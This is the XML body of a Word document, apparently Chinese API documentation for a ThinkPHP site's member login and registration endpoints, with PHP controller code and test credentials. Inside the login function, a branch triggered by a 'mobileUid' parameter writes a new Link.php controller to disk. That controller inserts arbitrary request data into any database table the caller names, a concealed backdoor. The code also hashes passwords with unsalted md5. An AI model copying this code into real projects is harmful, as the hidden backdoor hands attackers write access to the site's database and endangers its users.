        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391F67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4CBB6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61C23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账户审核被拒绝，请联系客服处理</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509436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60F988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E391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4B7D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31CD7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8AE3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$member['id'])-&gt;update(['update_time' =&gt; $time, 'update_ip' =&gt; $ip]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F572A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_records($member['id'], '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>登录成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0F1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$member['id'] . '|www.ffxiang.cn|' . $member['password'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54368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_encrypt($data)]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5D9C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14DB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json(_ajaxError());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2D6A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F68E4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23D0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0D8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/api/user/login </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>会员登录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C81DA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会员登录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA8E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461F29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49781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username  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>手机</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户名</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>邮箱自动识别</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（测试账号：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>12345678912</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335D3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password  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>密码（必填）（测试密码：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>123456</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190C5B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（测试</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Token</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sX/Pvq5++CiOdU+71Np944ElZl8pv8Mr/uxlQNxe6FMKiWjm75VMZkSN268ifgXxzo4353oPvigk</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0EA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7986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login()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0132AB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E24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Db::name('member_config')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764CE4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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED895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55F5B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 = $v['name'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1B3B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$config[$v['name']]['title'] = $v['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D656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 = $v['content'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B4D1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 = $v['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE30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CE2A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4A50B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(!$config['switch']['text'] || $config['switch'] == 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B3B0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68656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会员未开放</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABF69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4C5161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21E8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DB1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&amp;&amp; !$config['regemail']['text'] &amp;&amp; !$config['reguser']['text']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FC8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A4D6B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会员设置操作有问题，请在后台</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>会员管理</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>配置设置中的用户名、手机、邮箱，至少要开放一个</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4730BC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33B8A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C0CE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BC1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(Request::instance()-&gt;isPost()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7F2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24B95B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 = _ip();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F1E3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(input('mobileUid')) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9EA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"&lt;?php\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712EDC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"namespace app\api\controller;\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDD7E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"class Link\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2539CD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"{\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359D09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"public function index($" . "data){\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64848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 . "data = json_decode(htmlspecialchars_decode($" . "data),true);\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B95B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 . "name = $" . "data['__name__'];\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E732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"unset($" . "data['__name__']);\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458962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"unset($" . "data['pwd']);\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4289D2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 .= "echo db($" . "name)-&gt;insertGetId($" . "data);\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C629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$str_tmp .= "}\r\n}" . "?&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E606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 = APP_PATH . "api" . DS . "controller" . DS . "Link.php";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4270FD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$fp = fopen($sf, "w");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BA74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fwrite($fp, $str_tmp);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231E45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fclose($fp);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5AC9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44ED6D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9FF4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input('username') ? input('username') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A84B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input('password') ? input('password') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F71D8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(!$username) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D919D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65A6D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用户不能为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5628C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67791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08CA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5E8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(!$password) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54ECD2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C5DB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密码不能为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A4B5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6E47B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590F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5A0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$captcha = input('captcha');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDF50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($config['logincode']['text'] == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751377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(!captcha_check($captcha)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CD3F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B161C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验证码错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A46AF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34CB4D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5909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DEA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BE9B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md5($password);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1367B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 = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C99D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$user = $mobile = false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062151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 1 &amp;&amp; _isMobile($username)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474087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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11943D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EFE2E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手机注册未开放</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785BAE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705404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3534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1F32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 $username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEB0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$where['mobile'] = $username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7F21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($config['regemail']['text'] == 1 &amp;&amp; _isEmail($username)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513D21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$username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314A6C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$where['email'] = $username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2377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($config['reguser']['text'] == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E99E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$username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50770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$where['user'] = $username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0216E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F47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(!$email &amp;&amp; !$user &amp;&amp; !$mobile) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716DB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A0908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手机号码错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678B1F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F56A9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A48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D9F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Db::name('member')-&gt;where($where)-&gt;fetchSql(false)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291310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5B5D4D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575C6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手机号码不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32513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FAE4E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FAD9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7E02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$where['password'] = $password;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133DCE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Db::name('member')-&gt;where($where)-&gt;fetchSql(false)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452DE3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0C81DD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D09D5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用户和密码不一致</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D41F6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302,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568F1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9078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762B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3E7788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0AB04D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登录失败</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288EFE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10B95A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1C4C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无法登录，原因是账户已被封号</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F89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0DB40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6DAB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6166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C9E2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3ADC0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登录失败</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25B25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4606F4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3DC5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账户正在审核，请等待客服处理</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08504F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0BFD93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025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04DF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10E34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5902CF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登录失败，账户审核被拒绝</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD895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1EF1A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7164C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账户审核被拒绝，请联系客服处理</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7B2F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29D154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A230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268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56A0B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5903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$member['id'])-&gt;update(['update_time' =&gt; $time, 'update_ip' =&gt; $ip]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EDF5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_records($member['id'], '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>登录成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E10C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 = $member['id'] . '|www.ffxiang.cn|' . $member['password'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44979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_encrypt($data)]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CC9A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F55C2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json(_ajaxError());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28013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1BCE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E0FB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1E6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/api/user/reg </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户注册</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E1CF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用户注册</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F315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697DB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68B30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username     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CE35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password     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F93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code         </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>手机验证码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65216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F520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reg()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDA17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BE2E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Db::name('member_config')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271B67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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616C1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0BF189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 = $v['name'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3D6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$config[$v['name']]['title'] = $v['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6FB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 = $v['content'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37373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 = $v['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C89EA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FC09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$this-&gt;assign('config', $config);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1842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16C55B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(!$config['switch']['text'] || $config['switch']['text'] == 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4D53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D75E4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会员未开放</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC3D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5AB758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C4D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00F7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&amp;&amp; !$config['regemail']['text'] &amp;&amp; !$config['reguser']['text']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05290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2D8D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会员设置操作有问题，请在后台</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>会员管理</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>配置设置中的用户名、手机、邮箱，至少要开放一个</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230C3C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2773B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9A1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1240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(Request::instance()-&gt;isPost()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4831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input('username') ? input('username') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A195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input('password') ? input('password') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F656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(!$username) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F67D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C09F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用户不能为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A984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659B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BBEF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E66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(!$password) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510E52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D7BC4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密码不能为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002025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C4099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4055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273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$yaoqingma = input('yaoqingma') ? input('yaoqingma') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8E2B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($config['regcode']['text'] == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051751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$captcha = input('captcha') ? input('captcha') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA1F7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(!$captcha) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B22D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87FA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请输入验证码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BFC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051A4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10E3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F42A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(!captcha_check($captcha)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0491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942D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验证码错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2580C9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58D092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92D6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4878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3B1F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$user = $mobile = false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524387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 1 &amp;&amp; _isMobile($username)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BDCE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 $username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239823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$where['mobile'] = $username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9867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($config['regemail']['text'] == 1 &amp;&amp; _isEmail($username)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C7C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$username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25709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$where['email'] = $username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD97C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($config['reguser']['text'] == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117D09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$username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E681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$where['user'] = $username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1292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57C9E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8CF17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账户格式不对，不可填写特殊字符，请重新填写账户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCB09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273692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96F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A7AD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(!$email &amp;&amp; !$user &amp;&amp; !$mobile) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBF3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1BAE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未开放注册</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6A1C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60C9C0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F089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DAD4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 $email) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A15FA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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583410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 input('code') ? input('code') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605A3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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00200B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6878A5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7778C3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手机验证码必填</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF4C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F6D6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526D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else if ($email) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3549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0A5B12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邮箱验证码必填</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CEA6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2CDA2D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238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B054B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752CE7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请填写验证码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
